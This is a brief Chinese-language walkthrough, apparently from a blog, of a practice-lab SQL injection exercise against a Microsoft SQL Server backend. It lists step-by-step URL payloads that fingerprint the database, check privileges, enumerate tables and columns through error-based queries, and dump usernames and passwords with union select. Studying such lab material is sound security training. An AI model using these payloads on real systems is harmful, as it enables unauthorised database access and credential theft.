less-1
步骤一:判断注入方式 ?id=1' --+
步骤二:判断后台是否是MSSQL数据库(sysobjects 是 MSSQL 的系统表)
?id=1' and exists(select * from sysobjects) --+
步骤三:查询数据库信息,user回显的dbo表示是最高权限,如果是用户的名字表示是普通权限
?id=-1' union select 1,user,is_srvrolemember('public'); --+
步骤四:查询表名
第一张表:?id=-1'and (select top 1 cast (name as varchar(256)) from(select top 2 id,name from [sysobjects] where xtype=char(85) and status!=1 order by id)t order by id desc)=1--+
第二张表:?id=-1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users')--+
第三张表:?id=-1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users' and name !='emails')--+
第四张表:?id=-1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users' and name !='emails' and name !='uagents')--+
第五张表为空:?id=-1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users' and name !='emails' and name !='uagents' and name !='referers')--+
步骤五:显示字段信息
?id=1' having 1=1--
第二个字段 ?id=1' group by id having 1=1--
第三个字段 ?id=1' group by id,username having 1=1--
步骤六:查询字段值
1'order by 3-- //回显正常 1'order by 4-- //回显错误 找出回显值:-1'union select 1,2,3 from users-- 得出用户名和密码:?id=-1'union select 1,username,password from users-- From: https://blog.csdn.net/2301_82061181/article/details/141358934